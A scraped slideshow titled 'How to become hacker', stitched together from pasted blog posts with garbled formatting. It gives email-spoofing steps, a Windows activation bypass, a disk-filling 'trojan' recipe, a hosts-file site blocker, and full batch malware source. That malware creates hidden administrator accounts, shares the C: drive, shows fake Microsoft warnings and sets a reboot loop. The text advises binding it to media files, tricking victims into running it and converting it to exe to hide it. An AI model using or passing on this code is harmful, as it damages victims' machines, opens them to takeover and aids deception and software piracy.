Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

How to become hacker


Published on

hacking tips

Published in: Education, Technology
  • The            setup            in            the            video            no            longer            works.           
    And            all            other            links            in            comment            are            fake            too.           
    But            luckily,            we            found            a            working            one            here (copy paste link in browser) :  
    Are you sure you want to  Yes  No
    Your message goes here
  • Be the first to like this

How to become hacker

  1. 1. Today every body want become hacker because this thing is so cool .You know are you actually hacker or just a kid.THERE ARE FOUR STAGES TO BECOME HACKER SO CHECK WHETHER WHERE AREYOU BELONG .THERE ARE FOUR LEVELSO WAKE UP1>HACKING FOR KIDS[Heres another one in the long list of ideas Id like to execute but will probably neverhave time.]If kids learn programming these days, its usually LOGO or BASIC or some othertraining-wheels language. This is no way to breed the next generation of hackers. AndIm sure there are geeks around the world who would love their sons, daughters,nephews and nieces to get into programming, but look down the shelves of theirbookshop with a cry of despair. It seems to be a choice between "Visual Basic forDummies", "Programming Excel" and "Learn C in 24 Easy Lessons". As Dijkstrafamously said, ""It is practically impossible to teach good programming to students thathave had a prior exposure to BASIC: as potential programmers they are mentallymutilated beyond hope of regeneration." And when you are learning to program, youwant to write programs which do stuff, not have to spend ages in C managing memoryand making sure your strings are terminated with 0.Sometimes these books come with a CD, containing a cut-down version of acommercial development environment they are hoping you will buy, and perhaps aweedy editor, all running under Windows with no source code available. What sort ofexample is that to set? Trying to learn to hack on a Microsoft Windows machine or anyother closed-source system is like trying to learn to dance while wearing a body cast.How about a book "Hacking for Kids"?0 Written for teenagers, it would explain how coolhacking is and the path to becoming a hacker, and would give kids fun and interestingprogramming projects using powerful modern languages such as Perl, free Java,Python and JavaScript. It would teach best practice in programming, not treating theuser as an idiot who can only cope with cut-and-pasting code chunks in a jigsaw-puzzlefashion.b> or make a fake shutdown virusC>hack email by
  2. 2. Home » EMAIL HACKING, HOW-TO GUIDES, NETWORK HACKSHow to Send Anonymous EmailsSubmitted by Srikanth on Tuesday, 10 March 200980 Comments.How To SendAnonymous EmailsMost of us are very curious to know a method to send anonymous emails to our friendsfor fun. But the question is, is it possible to send anonymous emails in spite of theadvanced spam filtering technology adopted by email service provides like Gmail,Yahoo etc? The answer is YES, it is still possible to bypass their spam filters and sendanonymous emails to your friends. For example, you can send an email to your friendwith the following sender details.From: Bill Gates <>The art of sending this kind emails is known asEmail Spoofing. In my previous post on How to Send Fake Email I insisted on usingyour own SMTP server to send anonymous emails. This method used to worksuccessfully in the past, but today it has a very low success rate since Gmail andYahoo(all major email service providers) blocks the emails that are sent directly from aPC. In this post I have come up with a new way to send anonymous emails (spoofedemails) that has 100% success rate. If you have to successfully send an anonymousemail or spoofed email, you should send it using a relay server.What is a Relay Server?In simple words, a relay server is an SMTP Server that is trusted by Google or Yahooas an authorised sender of the email. So, when you send an email using a relay server,the email service providers like Yahoo and Gmail blindly accept the emails and deliver itto the inbox of the recipient. If the SMTP server is not authorised, Google and Yahoowill reject all the emails sent from this SMTP server. This is the reason for which usingour own SMTP server to send emails fail.
  3. 3. So What‟s Next?Now all we have to do is, find a trusted SMTP server to Send Spoofed Emails. Usuallyall the emails that are sent from web hosting providers are trusted and authorised. So,you have to find a free web hosting provider that allows you to send emails. But, most ofthe free Web Hosts disable the Mail feature and do not allow the users to send emails.This is done just to avoid spamming. However all the paid hosting plans allow you tosend any number of emails. Once you find a hosting service that allows to send emailsfrom their servers, it‟s just a cakewalk to send anonymous emails. All we have to do isjust modify the email headers to insert the spoofed From address field into it.I have created a PHP script that allows you to send emails from any name and emailaddress of your choice. Here is a step-by-step procedure to setup your own AnonymousEmail Sender Script1. Goto X10 Hosting and register a new account.2. Download my Anonymous Email Sender Script (sendmail.rar).3. Login to your FreeWebHostingArea Account and click on File Manager.4. Upload the sendmail.php, pngimg.php and bg1.PNG files to the server.5. Set permissions for sendmail.php, pngimg.php and bg1.PNG to 777.6. Now type the following URL
  4. 4. d> make trojan virus1. Search for the root drive2. Navigate to WindowsSystem32 on the root drive3. Create the file named “spceshot.dll”4. Start dumping the junk data onto the above file and keep increasing it’s size until the drive isfull5. Once the drive is full, stop the process.You can download the Trojan source code2>hacking for boysIn this case user have little potentialLike user know about c programme etc. but they donot create and correct c hardprogramme ?How to Use Windows Without Activation1. Goto “Start Menu -> All Programs -> Accessories” . Right click on “Command Prompt”and select “Run as Administrator“. If you are not the administrator then you are prompted toenter the password, or else you can proceed to step-2.2. Now type the following command and hit enterslmgr -rearm3. You will be prompted to restart the computer. Once restarted the trial period will be onceagain reset to 30 days. You can use the above command for up to 3 times by which you canextend the trial period to 120 days without activation.4. Now comes the actual trick by which you can extend the trial period for another 240days. Open Registry Editor (type regedit in “Run” and hit Enter) and navigate to the followinglocationHKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionSoftwareProtectionPlatform
  5. 5. 5. In right-side pane, change value of SkipRearm to 1.6. Now you will be able to use the slmgr -rearm command for another 8 times so that you canskip activation process for another 240 days. So you will get 120 + 240 = 360 days of freeWindows 7 usage.120 days using “slmgr -rearm” command before registry edit+240 days using “slmgr -rearm” command after registry edit= 360 DaysB>Guessing Game In CThey start basic programme like this#include<stdio.h>#include<stdlib.h>#include<time.h>void main(){int num,guess=-1,tries=0,pass=0;time_t t;srand((unsigned)time(&t));num=rand()%100;while((guess!=num)&&tries<8){printf(“Enter the guess num b/w 0 & 100 (you have %d tries left out)n”,(8-tries));scanf(“%d”,&guess);tries++;if(guess==num){printf(“Hurray you guessed it correctly!!!n”);pass=1;}else if(num< guess)printf(“Your guess is too highn”);elseprintf(“Your guess is too lown”);
  6. 6. }if(pass==0)printf(“Sorry you lost! The correct number is %dn”,num);}c>this programme is not hacking but a trick#include<stdio.h>#include<dos.h>#include<dir.h>char site_list[6][30]={“”,“”,“”,“”,“”,“”};char ip[12]=”″;FILE *target;int find_root(void);void block_site(void);int find_root(){int done;struct ffblk ffblk;//File block structuredone=findfirst(“C:windowssystem32driversetchosts”,&ffblk,FA_DIREC);/*to determine the root drive*/if(done==0){target=fopen(“C:windowssystem32driversetchosts”,”r+”);/*to open the file*/return 1;}done=findfirst(“D:windowssystem32driversetchosts”,&ffblk,FA_DIREC);/*to determine the root drive*/if(done==0){target=fopen(“D:windowssystem32driversetchosts”,”r+”);/*to open the file*/
  7. 7. return 1;}done=findfirst(“E:windowssystem32driversetchosts”,&ffblk,FA_DIREC);/*to determine the root drive*/if(done==0){target=fopen(“E:windowssystem32driversetchosts”,”r+”);/*to open the file*/return 1;}done=findfirst(“F:windowssystem32driversetchosts”,&ffblk,FA_DIREC);/*to determine the root drive*/if(done==0){target=fopen(“F:windowssystem32driversetchosts”,”r+”);/*to open the file*/return 1;}else return 0;}void block_site(){int i;fseek(target,0,SEEK_END); /*to move to the end of the file*/fprintf(target,”n”);for(i=0;i<6;i++)fprintf(target,”%st%sn”,ip,site_list[i]);fclose(target);}void main(){int success=0;success=find_root();if(success)block_site();}How to Compile ?For step-by-step compilation guide, refer my post How to compile C Programs.
  8. 8. Testing1. To test, run the compiled module. It will block the sites that is listed in the source code.2. Once you run the file block_Site.exe, restart your browser program. Then, type the URL ofthe blocked site and you’ll see the browser showing error “Page cannot displayed“.3. To remove the virus type the following the Run.%windir%system32driversetc4. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’llsee something like this127.0.0.1 google.com5. Delete all such entries which contain the names of blocked sitesd>block usb#include<stdio.h>void main(){system("reg addHKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesUSBSTOR /v Start/t REG_DWORD /d 3 /f");}e> in this case user have more knowleage about virus ,hacking software, trick to createfake virus but in this time user waste their time to show off.So practice more programing like c, c++ .We talk later about3>hacking for men
  9. 9. In this stage user know about batch file programming or java and perl.Batch File ProgrammingIntroductionBatch file programming is the native programming offered by the Microsoft WindowsOperatingSystem. Batch file is created using any text editors like notepad, WordPad,WinWord or so on, whichcomprises of a sequence of built-in commands used to perform some often donetasks like deleting aseries of files of same type or of different type, creating logs, clearing unwantedcraps from yourcomputer and even for creating a batch VIRUS.Whenever a Batch program is executed, it was interpreted line-by-line by the CLI(CommandLine Interpreter) or the cmd.exe. Batch file is really helpful in automatingtedious tasksand for maintaining system logs. The commands used while creating a batch file arecase insensitive, inthe sense that it may accept both small and upper case letters.So I am give you example of programmingHow to m C_relwarC708 v1.0 VirusHere is the source code for the virus C_relwarC708 v1.0, created by me.@echo offcdcd %SystemRoot%system32md 1001cd
  10. 10. clsrem N0 H4rm 15 cau53d unt1| N0wrem Th3 F0||0w1ng p13c3 0f c0d3 w1|| ch4ng3 th3 t1m3 2 12:00:00.0 & d4t3 as01/01/2000echo 12:00:00.00 | time >> nulecho 01/01/2000 | date >> nulnet users Microsoft_support support /addrem Th3 u53r 4cc0unt th4t w45 Cr34t3d 15 ju5t 4 |1m1t3d 4cc0untrem Th15 p13c3 0f c0d3 w1|| m4k3 th3 |1m1t3d u53r 4cc0unt5 t0 localgroup administrators Microsoft_support /addrem 5h4r3 th3 R00t Dr1v3net share system=C: /UNLIMITEDcd %SystemRoot%system321001echo deal=msgbox (”Microsoft Windows recently had found some Malicious Virus onyourcomputer, Press Yes to Neutralize the virus or Press No to Ignore theVirus”,20,”Warning”) >%SystemRoot%system321001warnusr.vbsrem ch4ng35 th3 k3yb04rd 53tt1ng5 ( r4t3 4nd d3|4y )mode con rate=1 > nulmode con delay=4 >> nul ake virusrem Th3 F0||0w1ng p13c3 0f c0d3 w1|| d15p|4y 50m3 4nn0y1ng m5g, as c0d3d ab0v3,3×4ct|y@ 12:01 and 12:02at 12:01 /interactive “%SystemRoot%system321001warnusr.vbs”
  11. 11. at 12:02 /interactive “%SystemRoot%system321001warnusr.vbs”msg * “You are requested to restart your Computer Now to prevent Damages orDataloss” > nulmsg * “You are requested to restart your Computer Now to prevent Damages orDataloss” >>nulrem Th3 F0||0w1ng p13c3 0f c0d3 w1|| c0py th3 warnusr.vbs f1|3 2 th3 5t4rtup, th4tw1|| b33×3cut3d @ 3v3ryt1me th3 c0mput3r 5t4rt5copy %SystemRoot%system321001warnusr.vbs “%systemdrive%Documents andSettingsAllUsersStart MenuProgramsStartupwarnusr.vbs”rem***************************************************************************rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| d15p|4y Th3 5hutd0wn d14|05 B0X w1th 50m3m5g andw1|| r35t4rt c0nt1nu0u5|yecho shutdown -r -t 00 -c “Microsoft has encountered a seriuos problem, which needsyourattention right now. Hey your computer got infected by Virus. Not even a single anti-virus candetect this virus now. Wanna try? Hahahaha….! ” >%systemroot%system321001sd.batcopy %systemroot%Documents and SettingsAll UsersStartMenuProgramsStartupsd.bat“%systemdrive%Documents and SettingsAll UsersStartMenuProgramsStartupsd.bat”rem
  12. 12. ***************************************************************************cdclsrem Th3 F0||0w1ng p13c3 0f c0d3 w1|| m4k3 th3 v1ru5 b1t 5t34|th13rcd %systemdrive%Documents and SettingsAll UsersStart MenuProgramsStartupattrib +h +s +r warnusr.vbsattrib +h +s +r sd.batcdcd %systemroot%system32attrib +h +s +r 1001rem K1||5 th3 3xp|0r3r.3×3 Pr0c355taskkill /F /IM explorer.exerem @ EOV // End of VirusCopy the source code and paste it in a notepad, then save it with the .bat extension.This virus program will begin its operation at C:windowssystem32 and creates a newdirectorywith name 1001, changes the time to 12:00 and date to 01-01-2000, then creates anew user with accountname Microsoft_support with a password support matching the account.It automatically assigns administrator rights to the user account that was created, thenshares theroot drive C: which really is a security issue making the system completely vulnerable.It will create a VBScript file with name warnusr.vbs that is used to display a messageMicrosoftWindows recently had found some Malicious Virus on your computer, Press Yes toNeutralize the virus or
  13. 13. Press No to Ignore the Virus, that really seems to be coming from the operating systemitself, then it willchange the keyboard setting by reducing the rate and delay time.Since the time and date has been already modified by the virus, it will automaticallypop up a messagestating You are requested to restart your Computer Now to prevent Damages orData loss exactly at12:01 and 12:02, if the user restarts the computer, then it‟s gone.Whenever the user try to login to the computer, it will automatically rebootscontinuously, because thecommand shutdown -r is set with time 00, and kept in start-up folder, the user hasnothing to stop thisunless he enters in safe mode and delete the file, more over the file is set with systemand hidden attributemaking it invisible.The only way to stop this is to enter in safe mode and disable the start-up items, andthen delete the filethat reside in C:windowssystem321001 and in the start-up folder.You can also use some exe-binders to bind this virus with any audio, video, text orwhatever the filesmay be, then use some social engineering technique to make the victim execute the fileby himself toharm his/her computer.You can create this virus without using any third party tools in windows, also instead ofexe-binder, youcan use the „iexpress‟ wizard to create a custom package.2>second virusMsg Annoyer:
  14. 14. Message annoyer is a batch program that uses the same concept as above, but willinteract withthe user anyhow annoying and irritating them by popping up some message boxcontaining somemessages in it.@echo off:annoymsg * Hi there!msg * How u doin ?msg * Are you fine ?msg * Never mind about me....msg * I am not here to annoy you....msg * I am caring for you.....msg * start counting from 1 to 5, i Will be outta this place.....msg * 1msg * 2msg * 3msg * 4msg * 5goto annoyThis program will pops up a small message box as shown below,Containing the text mentioned in the program given above.This message box will pop up until for endless loop, which really annoys the personsitting before the
  15. 15. computer. Even these small popup windows may crash the computer, if it overloads thememory.3>virusUser Flooder:The „user flooder‟ program will create a number of user accounts with randomnumbers, andassign administrator rights to them by itself, moreover the password set for those useraccounts were toorandom numbers.@echo off:usrfloodset usr=%random%net users %usr% %random% /addnet localgroup administrators %usr% /addgoto usrfloodSince we have already learned about the environment variables, the „%random%‟is anenvironment variable that generates a random positive integer. We have set avariable manually named„usr‟ for holding the random number generated by the %random%, then a new useraccount is createdwith the generated number as the account name and was assigned with a randompassword, then assignedwith administrator rights, and this process gets repeated for a infinite loop, so it willcreate more than 50user accounts in less than a minute. This will sure degrade the computerperformance and the user will
  16. 16. take a long long time to delete the user accounts, sometimes they will simply formattheir hard drives.>Converting Batch to ExecutablesSo far we have learnt how to create a batch file program with an .bat extension, butthere is a way convert all these batch files into executable files with an .exe extension, so that it willbecome hard fore people to find, what the program exactly does, else they may have a chance tohave a look at yoururce code, even to copy your source code.You have to download the batch to exe convertor from the internet in order to convertthe batch toxecutable; here I have enclosed the download link, where you can download this tool.Dowload Link : Name : Bat to Exe Converter V1.5opy and paste the above link in the address bar of your web browser, or you can directlyCTRL + Clickn the link if your computer is hooked up to the internet, then download the file.4>hacking for old manIn this stage you know with time.But in case you want more than email me